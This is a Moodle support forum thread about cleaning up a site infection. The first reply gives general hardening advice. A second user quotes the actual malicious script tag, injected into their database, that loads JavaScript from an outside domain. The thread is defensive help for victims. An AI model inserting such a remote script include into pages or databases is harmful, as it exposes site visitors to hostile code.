Howto find Trojan HTML/ScrInject.B trojan on my site?

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

by Howard Miller -
Number of replies: 1
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers
Firstly, I have no idea what that Trojan actually is. We regularly see false positives around Moodle so there may not be anything to worry about.

The only way that the code can be updated if you have incorrect permissions. It is vital (assuming your site is accessible from the public internet) that the Moodle code files are NOT writeable by the web server user. The classic trojan in PHP code will write a whole bunch of seemingly random characters on the <?php line. That's worth a look for in common files like config.php and the main index.php

See also Hacked_site_recovery
Average of ratings: -
In reply to Howard Miller

Re: Howto find Trojan HTML/ScrInject.B trojan on my site?

by Jean-François PETIT -

Hi

i found a malware inject in my database

I am on moodle 3.5 on Centos

//cooljorrd//

<script type="text/javascript" src="https://cooljorrd.com/222f7a82dfe46c1031.js"></script>

and affect question and all table question answer feedback with html

I want open script secure on editor but only for admin, do you know how to clean the database, and how to forbidden <script>

Thanks

Average of ratings: -